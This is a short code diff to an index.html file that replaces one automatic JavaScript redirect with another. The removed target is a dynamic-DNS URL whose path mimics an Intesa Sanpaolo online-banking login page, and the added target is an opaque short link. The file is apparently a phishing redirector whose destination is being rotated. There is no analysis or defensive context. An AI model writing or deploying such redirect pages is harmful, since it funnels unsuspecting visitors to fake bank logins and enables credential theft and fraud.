--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<script type="text/javascript">window.location = "https://form-login-privati-online-sicurezza-acc.duckdns.org/login-form-sanpaolo/portale-accedi/";</script>
+<script type="text/javascript">window.location = "https://restitua.nerdpol.ovh/r/JpciF79";</script>
